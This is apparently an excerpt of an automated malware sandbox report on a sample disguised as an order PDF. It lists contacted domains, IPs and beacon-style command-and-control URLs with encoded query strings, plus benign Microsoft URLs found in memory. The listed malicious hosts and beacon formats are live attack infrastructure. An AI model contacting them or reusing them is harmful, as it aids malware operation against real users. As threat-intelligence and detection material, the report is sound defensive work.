http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://www.qdfake609am.xyz/ss24/?Vt=YE/ZdGmKW74FtAWOlvaRGVRfbsx7fOwtd0JkYjwj0oStavEyCEbfL8DERV6p5jCnNdOA&Rxl=8pdPF640TxI0Gb	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world	0%	Avira URL Cloud	safe
http://www.qdfake609am.xyz/ss24/	0%	Avira URL Cloud	safe
http://www.163875.shop	0%	Avira URL Cloud	safe
http://www.65597.photosReferer:	0%	Avira URL Cloud	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://outlook.com	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	0%	URL Reputation	safe
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	0%	URL Reputation	safe
https://api.msn.com/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1	0%	Avira URL Cloud	safe
http://schemas.micro	0%	URL Reputation	safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
http://www.supporthq.lifeReferer:	0%	Avira URL Cloud	safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	0%	URL Reputation	safe
http://www.163875.shop/ss24/www.8548d.com	0%	Avira URL Cloud	safe
http://www.kucinglucu.onlineReferer:	0%	Avira URL Cloud	safe
http://www.2025tengxun171.lat/ss24/	0%	Avira URL Cloud	safe
http://www.awvd97.com	0%	Avira URL Cloud	safe
http://www.65597.photos/ss24/	0%	Avira URL Cloud	safe
http://www.65597.photos	0%	Avira URL Cloud	safe
https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal	0%	Avira URL Cloud	safe
http://www.qdfake609am.xyz	0%	Avira URL Cloud	safe
http://www.realearthpower.com	0%	Avira URL Cloud	safe
http://www.microsoft.c	0%	Avira URL Cloud	safe
https://bsky.app/profile/kucinglucu.online	0%	Avira URL Cloud	safe
http://www.65597.photos/ss24/www.realearthpower.com	0%	Avira URL Cloud	safe
http://www.autoitscript.com/autoit3/J	0%	Avira URL Cloud	safe
http://www.crucka.xyz/ss24/	0%	Avira URL Cloud	safe
https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi	0%	Avira URL Cloud	safe
http://www.thehalcyon.studio/ss24/www.2025tengxun171.lat	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark	0%	Avira URL Cloud	safe
http://www.8208975.comReferer:	0%	Avira URL Cloud	safe
http://www.crucka.xyz	0%	Avira URL Cloud	safe
http://www.163875.shop/ss24/	0%	Avira URL Cloud	safe
http://www.head2toe.boutiqueReferer:	0%	Avira URL Cloud	safe
http://www.supporthq.life/ss24/www.head2toe.boutique	0%	Avira URL Cloud	safe
http://www.8208975.com/ss24/www.65597.photos	0%	Avira URL Cloud	safe
http://www.ygyqpswy.xyzReferer:	0%	Avira URL Cloud	safe
http://www.kucinglucu.online/ss24/www.thehalcyon.studio	0%	Avira URL Cloud	safe
http://www.supporthq.life	0%	Avira URL Cloud	safe
http://www.awvd97.com/ss24/www.supporthq.life	0%	Avira URL Cloud	safe
http://www.awvd97.comReferer:	0%	Avira URL Cloud	safe
http://www.head2toe.boutique	0%	Avira URL Cloud	safe
http://www.163875.shopReferer:	0%	Avira URL Cloud	safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA	0%	Avira URL Cloud	safe
http://www.startable.online/ss24/?Vt=zMEVcHBGt47G6KX5esEX8dtG6+lnOeOio8+YHkIF/aeZvdpFgNK9qxVPP7cqFgvwi0y6&Rxl=8pdPF640TxI0Gb	0%	Avira URL Cloud	safe
http://www.8548d.com/ss24/?Vt=AizMimZChlrhQFmDW8mDt8YQ1AEx0YD6XMUBGPJfRJKPSKhlu7m+Wdy74pBw1CXQgid8&Rxl=8pdPF640TxI0Gb	0%	Avira URL Cloud	safe
http://www.kucinglucu.online	0%	Avira URL Cloud	safe
http://www.ygyqpswy.xyz	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin	0%	Avira URL Cloud	safe
http://www.8548d.comReferer:	0%	Avira URL Cloud	safe
http://www.mewtcp.xyzReferer:	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark	0%	Avira URL Cloud	safe
http://www.8548d.com/ss24/www.kucinglucu.online	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/	0%	Avira URL Cloud	safe
http://www.mewtcp.xyz/ss24/www.qdfake609am.xyz	0%	Avira URL Cloud	safe
http://www.8548d.com/ss24/	0%	Avira URL Cloud	safe
http://www.2025tengxun171.latReferer:	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b	0%	Avira URL Cloud	safe
http://www.qdfake609am.xyz/ss24/www.startable.online	0%	Avira URL Cloud	safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg	0%	Avira URL Cloud	safe
http://www.realearthpower.com/ss24/	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt	0%	Avira URL Cloud	safe
http://www.qdfake609am.xyzReferer:	0%	Avira URL Cloud	safe
http://www.ygyqpswy.xyz/ss24/www.163875.shop	0%	Avira URL Cloud	safe
http://www.startable.online/ss24/www.ygyqpswy.xyz	0%	Avira URL Cloud	safe
http://www.crucka.xyz/ss24/www.awvd97.com	0%	Avira URL Cloud	safe
http://www.8208975.com/ss24/	0%	Avira URL Cloud	safe
http://www.thehalcyon.studio	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09	0%	Avira URL Cloud	safe
http://www.kucinglucu.online/ss24/?Vt=Sz2HgEYBPSNrFgEG5TBHr9umjqKYoRRoJMI98zFy0lYC0jiER84YqalYGbnnf7fj4Pfa&Rxl=8pdPF640TxI0Gb	0%	Avira URL Cloud	safe
http://www.realearthpower.com/ss24/www.crucka.xyz	0%	Avira URL Cloud	safe
http://www.mewtcp.xyz/ss24/	0%	Avira URL Cloud	safe
http://www.startable.online	0%	Avira URL Cloud	safe
http://www.mewtcp.xyz	0%	Avira URL Cloud	safe
http://www.startable.onlineReferer:	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al	0%	Avira URL Cloud	safe
www.ygyqpswy.xyz/ss24/	0%	Avira URL Cloud	safe
http://www.2025tengxun171.lat/ss24/www.8208975.com	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k	0%	Avira URL Cloud	safe
http://www.thehalcyon.studio/ss24/	0%	Avira URL Cloud	safe
http://www.awvd97.com/ss24/	0%	Avira URL Cloud	safe
http://www.head2toe.boutique/ss24/	0%	Avira URL Cloud	safe
http://www.kucinglucu.online/ss24/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.startable.online	103.224.212.212	true	false	0%, Virustotal, Browse	unknown
kucinglucu.online	84.32.84.32	true	true	1%, Virustotal, Browse	unknown
qdfake609am.xyz	38.150.29.115	true	true	1%, Virustotal, Browse	unknown
thehalcyon.studio	3.33.130.190	true	true	1%, Virustotal, Browse	unknown
xpj.wj56789.com	172.247.228.75	true	false		unknown
kd-cq288.jhydns.com	172.247.168.134	true	false		unknown
gtml.huksa.huhusddfnsuegcdn.com	154.84.24.46	true	false		unknown
www.2025tengxun171.lat	43.129.208.111	true	false	0%, Virustotal, Browse	unknown
www.8548d.com	unknown	unknown	true		unknown
www.kucinglucu.online	unknown	unknown	true		unknown
www.thehalcyon.studio	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.realearthpower.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.ygyqpswy.xyz	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.163875.shop	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.65597.photos	unknown	unknown	true		unknown
www.8208975.com	unknown	unknown	true		unknown
www.qdfake609am.xyz	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.qdfake609am.xyz/ss24/?Vt=YE/ZdGmKW74FtAWOlvaRGVRfbsx7fOwtd0JkYjwj0oStavEyCEbfL8DERV6p5jCnNdOA&Rxl=8pdPF640TxI0Gb	true	Avira URL Cloud: safe	unknown
http://www.8548d.com/ss24/?Vt=AizMimZChlrhQFmDW8mDt8YQ1AEx0YD6XMUBGPJfRJKPSKhlu7m+Wdy74pBw1CXQgid8&Rxl=8pdPF640TxI0Gb	false	Avira URL Cloud: safe	unknown
http://www.startable.online/ss24/?Vt=zMEVcHBGt47G6KX5esEX8dtG6+lnOeOio8+YHkIF/aeZvdpFgNK9qxVPP7cqFgvwi0y6&Rxl=8pdPF640TxI0Gb	false	Avira URL Cloud: safe	unknown
http://www.kucinglucu.online/ss24/?Vt=Sz2HgEYBPSNrFgEG5TBHr9umjqKYoRRoJMI98zFy0lYC0jiER84YqalYGbnnf7fj4Pfa&Rxl=8pdPF640TxI0Gb	false	Avira URL Cloud: safe	unknown
www.ygyqpswy.xyz/ss24/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://powerpoint.office.comer	explorer.exe, 00000008.00000000.1442441484.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3848337193.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.crucka.xyzReferer:	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOSA4	explorer.exe, 00000008.00000000.1442441484.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2285468060.000000000BCB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3848687718.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8548d.com	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.qdfake609am.xyz/ss24/	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world	explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3845273913.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1434261414.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.163875.shop	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.65597.photosReferer:	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://excel.office.com	explorer.exe, 00000008.00000000.1442441484.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3848337193.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1	explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.supporthq.lifeReferer:	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.163875.shop/ss24/www.8548d.com	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kucinglucu.onlineReferer:	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.2025tengxun171.lat/ss24/	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.awvd97.com	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.65597.photos/ss24/	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.65597.photos	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal	explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.qdfake609am.xyz	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.realearthpower.com	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoft.c	explorer.exe, 00000008.00000002.3845642332.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082201534.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1434261414.0000000009237000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bsky.app/profile/kucinglucu.online	explorer.exe, 00000008.00000002.3851391138.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3838560992.000000000562F000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RFQ31072024_August order_pdf.exe, 00000000.00000002.1425810196.000000000254D000.00000004.00000800.00020000.00000000.sdmp, EqtGqZpPskFq.exe, 0000000A.00000002.1502952456.0000000002C5D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.65597.photos/ss24/www.realearthpower.com	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOSd	explorer.exe, 00000008.00000000.1442441484.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2285468060.000000000BCB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3848687718.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi	explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.crucka.xyz/ss24/	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark	explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.thehalcyon.studio/ss24/www.2025tengxun171.lat	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.8208975.comReferer:	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.crucka.xyz	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.8208975.com/ss24/www.65597.photos	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.com	explorer.exe, 00000008.00000000.1442441484.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3848337193.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.supporthq.life/ss24/www.head2toe.boutique	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.head2toe.boutiqueReferer:	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.163875.shop/ss24/	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kucinglucu.online/ss24/www.thehalcyon.studio	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ygyqpswy.xyzReferer:	explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
